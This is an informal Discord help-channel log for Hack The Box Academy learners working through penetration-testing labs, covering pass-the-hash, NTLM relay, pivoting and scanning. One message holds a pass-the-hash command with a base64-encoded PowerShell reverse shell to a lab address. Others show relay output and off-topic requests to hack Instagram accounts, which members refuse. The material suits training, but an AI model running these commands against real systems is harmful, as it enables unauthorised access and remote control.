compact patrolBOT
normal sand
#

Module: AD Enumeration & Attacks
Section: Attacking Domain Trusts - Child -> Parent Trusts - from Linux
https://academy.hackthebox.com/module/143/section/1508

I need a nudge on the end of section question. I've logged onto the attack host, ACADEMY-EA-ATTACK01. I can see there's another machine ACADEMY-EA-DC02, which seems to be a DC. It seems to be the parent DC? (I'm unsure)

timber hatch
#

INFORMATION GATHERING - WEB EDITION
Skills Assessment
What is the API key in the hidden admin directory that you have discovered on the target system?

i tried to bruteforce with ffuf, dns enum and gobuster - but i haven't found a hidden directory. any hint?

next bronze
normal sand
# next bronze check the domain name and it should be pretty obvious

The domain name? I tried performing an Nmap scan of ACADEMY-EA-DC02 and it returned the domain ||INLANEFREIGHT.LOCAL|| as part of the report. But that seems to be the parent DC. I was assuming that with this question, we'd be starting off having compromised the child domain?

next bronze
normal sand
next bronze
#

right then you should find the child domain to begin the attack

next bronze
normal sand
normal sand
next bronze
#

netexec will output the domain name rightaway btw

next bronze
normal sand
normal sand
next bronze
normal sand
normal sand
next bronze
#

I'd suggest to check the section again on both the manual and automated methods to understand what they're doing

jolly yacht
#

hey, I'm new to htb academy. if i hover over this highlighted text will it show some info about it in a small box kind of? its mentioned that it will show some info in this section but if i hover over the highlighted text in yellow it nothing is showing up. I mean , am i missing something or it is just a highlighted text?

stone verge
#

Hi, is it possible to see on a website which usings a ai tool in the background, to see the prompt and so on?

coral apex
#

Hi,
Module: Information Gathering - Web Edition
Section: Skill Assessment
Question: "After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb."
I'm using ffuf and zaproxy and I was fuzzing http://inlanefreight.htb:port/FUZZ url with these seclist wordlist: common.txt, big.txt, directory-list-2.3-medium.txt but with no luck. I did the same for subdomain and hidden admin directory.
What am I missing? 😄 Can someone share a hint?

next bronze
jolly yacht
fathom pendant
#

<@&861185840277487616> at this point I swear they're a bot

acoustic owl
fathom pendant
coral apex
cunning cape
#

hey, having issues submitting commands on mysql. screenshot attached, looks correct from my previous notes. any ideas?

#

like it's not coming back as an error, just to a new line. I remember mysql being awkward

#

lol never mind. exited mysql and logged back in and it's working fine now

gusty patio
#

SQL INJECTION FUNDAMENTALS
Intro to MySQL

Why cant i connect to the sql server??

mysql -u root -h Target_ip -P Target_port -p
bash: mysql: command not found

placid quest
#

@gusty patio Install mysql

gusty patio
#

even on the machine?

placid quest
#

@gusty patio On you attacking machine

gusty patio
#

shouldnt the pwnbox have it pre installed? I can see a file named mysql_config but thats about all

next bronze
#

did the upate break it kekw

gusty patio
icy cypress
#

Hi, do I need to perform OSINT: Corporate Recon in order to take the Penetration Testing Certification exam?

shut quest
wanton estuary
#

Have you finished the skill assessment?

icy cypress
shut quest
icy cypress
tranquil axle
next bronze
next bronze
#

you'll just need to complete the Penetration Tester job-role path

shut quest
cunning frigate
#

https://academy.hackthebox.com/module/84/section/1747

Using CrackMapExec - Skill Assesment

I have used ||drop-sc|| and have ||ntlmrelay|| on but it does not output any hashes

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.129.204.182, attacking target smb://172.16.15.15
[*] Authenticating against smb://172.16.15.15 as INLANEFREIGHT/JAMES SUCCEED
[*] SMBD-Thread-6 (process_request_thread): Received connection from 10.129.204.182, attacking target smb://172.16.15.20
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Authenticating against smb://172.16.15.20 as INLANEFREIGHT/JAMES SUCCEED
next bronze
cunning frigate
#

As for other who checks later:
Yes it worked and no need for proxychains

silk minnow
fleet saddle
#

hi, anybody completed the HTTP Misconfiguration Skill Assessment - Hard? can i get a nudge?

earnest fern
#

hello how do i get permission to talk in general channel and pwnbox?

spice fulcrum
#
Connect Scan
The Nmap TCP Connect Scan (-sT) uses the TCP three-way handshake to determine if a specific port on a target host is open or closed. The scan sends an SYN packet to the target port and waits for a response. It is considered open if the target port responds with an SYN-ACK packet and closed if it responds with an RST packet.

The Connect scan is useful because it is the most accurate way to determine the state of a port, and it is also the most stealthy. Unlike other types of scans, such as the SYN scan, the Connect scan does not leave any unfinished connections or unsent packets on the target host, which makes it less likely to be detected by intrusion detection systems (IDS) or intrusion prevention systems (IPS). It is useful when we want to map the network and don't want to disturb the services running behind it, thus causing a minimal impact and sometimes considered a more polite scan method.

it says TCP scan is more stealthy compared to SYN scan. Isnt this wrong? I thought TCP scan is more likely to get detected since it completes the threeway handshake. I googled online and most ppl says the same as me. am I misunderstanding some here?

swift carbon
#

amazing module. shout out to 21y4d for the awesome content

topaz zenith
#

so burpsuite is just not reaching the box on the Exam now for me, I have pinged it nmapped it, gone to it on my own browser. Any ideas?

swift carbon
topaz zenith
#

Appreciate it, downloaded a new vpn file but didn't think about that

#

Yeah still not working lol

lilac warren
#

new to cyber security
feeling lost... don't where to start

compact patrolBOT
wanton idol
#

games would be ctfs. platform hackthebox. hope this helped

next bronze
#

I doubt it's a problem with the exam env, if they can reach the web server then the env is good

#

probably something with burp

sour notch
#

Hi there, is anyone having issues with the PASSWORD ATTACKS windows machines? it keeps in Target(s) are spawning forever 😦

wanton idol
runic depot
#

xsltproc, rename the target using mv target target.xml then run the command and drag the xml into firefox. just putting this here

kindred dawn
#

Hey guys, Im having a little bit of a hard time understanding what chisel and proxychains is used for. Its in the Pass the ticket LINUX Section of the PASSWORD attacks Module, (Using Linux Attack Tools with Kerberos). Thanks in advance for any help

gaunt olive
#

Hello people, I need help with hacking an Instagram account which is trying to impersonate my friend. Need to hack his I'd and delete my photos

next bronze
#

no

next bronze
rich crescent
#

hey guys, I'm trying to perform an Nmap scan on a target IP, but I'm encountering issues. When I run sudo nmap -sV IP, it shows the host is down. Using -Pn shows the host is up, but all ports are filtered. Scanning port 80 with sudo nmap -sV -Pn -p 80 IP shows it as filtered without displaying the service version. My local firewall (ufw) is inactive, how can i solve this?

runic depot
#

why do i always see someone in here with google or instagram hacking stuff. i don't know jack bout that

fathom pendant
runic depot
kindred dawn
next bronze
#

proxychains is used to tunnle traffic through chiesel

kindred dawn
# next bronze proxychains is used to tunnle traffic through chiesel

So, from my attacking machine: I configured proxychains as socks5 localhost and port 1080. Then set up a chisel reverse server and connect back from the jump host. So now, should I be able to access the linux machine? (which is part of the network of MS01/jumphost). And also, from which part /how does chisel uses proxychain in that scenario?

runic depot
#

im not impressive enough to do instagram hacking stuff, i just look at splunk and mft and $j

rich crescent
runic depot
#

which sub module

kindred dawn
#

Here is how I see it, but I dont understand how proxychain is used by chisel

rich crescent
next bronze
# kindred dawn

chisel creates the socks tunnel, proxychains gets whatever program that you're running to use that tunnel

#

they will explain more in the Pivoting, Tunneling, and Port Forwarding module

runic depot
kindred dawn
kindred dawn
fathom pendant
runic depot
#

ah ok, i skipped that to get to Nmap (next module), i need to go back, i thought it was going to be pretty short

fathom pendant
fathom pendant
kindred dawn
#

marcielee hacks ig accounts

#

when she's bored

fathom pendant
#

I hack into your mother's room

kindred dawn
#

That's unfortunate

rich crescent
fathom pendant
#

It's called getting started

kindred dawn
#

Marcielee the type of person to simswap her exes

dim wolf
#

huh?

next bronze
#

huh?

rich crescent
#

btw do you guys know how to solve the issues?

fathom pendant
kindred dawn
fathom pendant
fathom pendant
kindred dawn
#

Ok ill stop cus i need help too

fathom pendant
#

Still not funny

dim wolf
#

there is a time and place

fathom pendant
#

^

kindred dawn
#

oh yeah that's right

rich crescent
fathom pendant
#

Kali should work

#

Try: resetting the target, changing VPN regions
Optional: pray to a higher power, pray to a lower power

kindred dawn
#

check if you have only one connection or multiple

#

and you should also try running the openvpn file as sudo : sudo openvpn <name>.ovpn

fathom pendant
#

He would get a "no route to host" error if he couldn't at least connect to it

#

I suggest also sudo killall openvpn then rerunning the connection

rich crescent
#

it finally works, thanks guys

fathom pendant
#

You need to link your htb labs account following #welcome

fathom pendant
#

This has nothing to do with htb

#

I suggest deleting these images as they're completely irrelevant

#

These are fake support messages

#

So just ignore

#

Only what you enter

#

They could steal cookie/token data maybe

#

Best practice: don't click suspicious links or emails

#

Just ignore and move on

#

Yes that's how discord works

solar zodiac
fierce dock
#

Hello I have a question, why would someone want to convert a wordlist such as rockyou.txt in kali to utf-8? What are the advantages of doing this?

#

Don't know if this is the right server to ask?

wanton estuary
solar zodiac
fierce dock
#

A lab I set up from vulnhub

solar zodiac
#

I think it varies from application to application

#

or OS to OS

fierce dock
#

Yeah, I'm struggling to understand when and why to convert to utf 8 I'm still begginer/intermediate

solar zodiac
#

I'm honestly not sure why kali wouldn't be able to parse and make use of both wordlists.

#

like when you're making a download cradle on kali to run on windows, you have to encode it in UTF 16 I think

#

I could be wrong with the UTF value chosing

#

honestly im not the best person to ask so I'll be quiet lol

fierce dock
#

Thanks for helping though appreciate it

main spear
#

Hello, can someone help me with ligolo ? i would like to do a double pivot but unfortunately i can't make it to work with only ligolo, do you use an other solution ? it is for the module attacking enterprise network

fathom pendant
#

Ligolo works fine for me in double pivots. I practiced it on the double pivot section in the pivoting module first

#

You need to have a listener on the first host you have ligolo running on point back to you, then on the second host you need to have it connect to the first host:port you are forwarding

#

With newer versions you need to set up multiple tunnels if you want multiple concurrent sessions

static roost
#

#Module: Introduction to C#
#Section: Arrays

End of section question. Obviously getting the answer wrong. Seems simple. No clue what I'm missing here. Using semicolon. Tried several variations. Any help here would be greatly appreciated.

nvm got it

strange forge
#

how to save output of cmd into a text file. findstr /spin "password" . . iam not able to copy, any suggestions to filter result

split glade
next bronze
zealous rune
#

`─[zuuuttt@parrot]─[~/htb_cpts/modules/password_attacks]
└──╼ $proxychains evil-winrm -i dc01.inlanefreight.htb -r inlanefreight.htb
ProxyChains-3.1 (http://proxychains.sf.net)

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
|DNS-request| DC01.inlanefreight.htb
|S-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<--timeout
|DNS-response|: DC01.inlanefreight.htb does not exist

Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Invalid argument

Error: Exiting with code 1
`

fathom pendant
#

it also looks like your proxychains is proxying through a public IP

zealous rune
#

been added. don't understand why it is dns'ing for the address

next bronze
#

wait I've seen this one before

fathom pendant
#

is it in your hosts list as DC01.inlanefreight.htb?

fathom pendant
next bronze
#

same problem here

zealous rune
#

172.16.1.10 inlanefreight.htb inlanefreight dc01 dc01.inlanefreight.htb 172.16.1.5 ms01.inlanefreight.htb ms01

next bronze
#

but idk how they solved it

fathom pendant
#

they seem to be having the same issue you did

#

My way of solving it: use ligolo Kappa

zealous rune
#

/etc

#

use ligolo?

fathom pendant
#

ligolo-ng is a pivoting tool that's (imo) better than chisel/dynamic forwarding that requires proxychains

zealous rune
#

ah ok

#

I'll check it tomorrow

#

gotta go bed now. thx again for the hints

fringe urchin
#

Lol

fringe urchin
#

But yea just learn ligolo way less pain in later modules aswell from what i heard

fringe urchin
fathom pendant
#

Solution: just turn it off and on again 🗿

split glade
#

ligolo-ng >>> create a tunnel with plastic cups and a string > other tools

fringe urchin
astral dawn
#

Does anyone know what USDT/Erc 20 Flashing is i know it works altough 90% is somoene trying to get you to install a Keylogger. i thought in the area of maybe Flash loans in combination with RBF could anyone explain how it works?

fathom pendant
#

Be mindful of #rules and if you wanna chat in other rooms, read and follow #welcome

astral dawn
#

read correctly im not rying to make a keylogger

dim wolf
fathom pendant
#

My point is, keyloggers aren't covered by academy

astral dawn
fathom pendant
dim wolf
#

find a relevant channel, verify your account -> #welcome

fathom pendant
#

But you need to actually read and follow #welcome to access

astral dawn
#

looked all around the internet but no one could help me

fathom pendant
#

Sounds like an issue with your question then

ocean night
#

Sounds pretty sketch..

#

If it sounds too good to be true, it usually is

fringe urchin
#

I wrote one for my bachelorpepecoffee

fathom pendant
#

If you can't find your answer by googling, then the issue is you're asking the wrong question

astral dawn
fringe urchin
astral dawn
#

it has something to do with an exodus bug and RBf

fathom pendant
#

Brother

#

You're not gonna find answers in this channel

obsidian belfry
#

Hey all. Currently working on Premature Session Population in the "Abusing HTTP Misconfigurations" module. I followed every steps shown exactly in the section but still can't bypass auth. Any nudges would be appreciated. thanks.

pine dune
#

yo @fathom pendant I got a question 😅

#

im trying to brute force vhosts on the information gathering module, however its not working 😅

sweet jewel
pine dune
#

@sweet jewel

sweet jewel
#

i've only ever used gobuster vhost with the domain passed to -u, i don't know if that matters tho

#

try running with --verbose

dusky gyro
#

Not sure how I go about fixing this issue, but sqlmap doesn't work properly on my kali vm but on pwnbox it works fine, always get connection timed out on the url. Both using the same command, any thoughts if its my hyper-v or something blocking my vm?

split glade
dusky gyro
#

vm sqlmap version is 1.8.6.3#dev where as pwn is 1.8.3#stable, maybe issue is in this?

split glade
#

Then a screenshot of the sqlmap command with the result? Did you try to run sqlmap with -v 6?
Oh you're running a dev version? Why?

sweet jewel
#

try increase the timeout?

dusky gyro
dusky gyro
sweet jewel
#

could u show the entire command output, and the cmd u ran

#

run a curl in the same screenshot just incase

crimson moon
#

In metasploit path, meterpreter module while trying to spin up msf I’m getting an error while checking “db_status”
Error: postgresql selected, no connection

I have tried solutions from the other forums and what not but this doesn’t seem to get connected to the database

#

Tried deleting msfdb and changing port on database.yml file but to no avail. Also, the service is up and running for postgresql.

If anybody has encountered this same problem how did you go about fixing it?

sweet jewel
next bronze
#

my kali works with the same sqlmap version

#

you can run it through a proxy or wireshark if you want to know why

dusky gyro
next bronze
#

also some AV might be blocking the requests

next bronze
spring ivy
#

Hi people, in the SQL Injection module in HTB Academy, I have to use mysql to connect to a remote server, but in the pwn box machine there is only mysql_config package. I tried to install mysql, but failed. Can someone help me?

dusky gyro
next bronze
#

defender shouldn't block it

dusky gyro
#

thanks for the helps all

clever topaz
#

anyone can help me with LPE - log rotate? my payload wont work been stuck on this for 3 days

ivory nymph
#

Can anyone help me with this question, it's to pass david's hash and read file on the share, i did the same for user julio and got the reverse shell, but for david it's not working 😦
||PS C:\tools> Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username david -Hash c39f2beb3d2ec06a62cb887fb391dee0 -Command "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA3ADIALgAxADYALgAxAC4ANQAiACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" [-] inlanefreight.htb\david WMI access denied on DC01||

split glade
#

Ah yes, the famous question with david's hash from that one module... which one was it already?

next bronze
ivory nymph
fathom pendant
fathom pendant
fathom pendant
dusky gyro
split glade
fathom pendant
#

The main point of the section is to try all the methods mentioned in it

#

And if you visit the page in a browser it gives you a hint to what to use

dusky gyro
fathom pendant
#

¯_(ツ)_/¯

dusky gyro
#

just didn't know if it was my hyper-v , AV , or something blocking it

fathom pendant
#

You have to bear in mind all the modules are confirmed doable on pwnbox

fathom pendant
next bronze
#

nah the config files are the same

#

even if it's blocking the agent or something, it wouldn't be timing out

dusky gyro
#

so it's the servers WAF denying me but letting pwnboxes through?

fathom pendant
#

¯_(ツ)_/¯

#

I didn't have issues with it on my vm

dusky gyro
fathom pendant
#

<@&861185840277487616>

#

I swear someone had this exact message months ago

uneven iron
#

I only had posted ..since I dint get any response. .. I have reposted It as Reminder

#

If any cyber security professional us there in this channel ..please help me out by participating in this online survey

urban sage
fathom pendant
#

Most people are hesitant to trust a random Google form

#

There's also more channels you can unlock via following #welcome

uneven iron
#

I had got the permission for the first time ... Do I have to get the permission .. For again putting a reminder message?

#

Sorry for the inconvenience. . im new to discord ...

fathom pendant
#

Generally yes

#

Considering a significant amount of time has passed

crimson moon
#

In metasploit path, meterpreter module while trying to spin up msf I’m getting an error while checking “db_status”
Error: postgresql selected, no connection

I have tried solutions from the other forums and what not but this doesn’t seem to get connected to the database

Tried deleting msfdb and changing port on database.yml file but to no avail. Also, the service is up and running for postgresql.

If anybody has encountered this same problem how did you go about fixing it?